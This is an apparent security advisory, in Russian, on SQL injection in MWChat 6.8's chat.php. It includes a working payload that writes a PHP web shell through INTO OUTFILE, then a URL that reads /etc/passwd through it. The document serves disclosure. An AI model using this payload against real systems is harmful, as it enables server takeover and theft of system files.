Программа: MWChat 6.8 и более ранние версии 

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость обнаружена при обработке входных данных в переменной Username сценария chat.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. 

Пример:

http://[target]/mwchat/chat.php?Username='UNION%20 SELECT%200,0,0,0,'<?system($_GET[cmd]);?>',0,0,0
%20INTO%20OUTFILE%20'../../www/mwchat/shell.php'%20 FROM%20chat_text/*&Sequence_Check=&Lang=en&
Resolution=1280&Room=prova

И, затем:

http://[target]/mwchat/shell.php?cmd= cat%20/etc/passwd

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии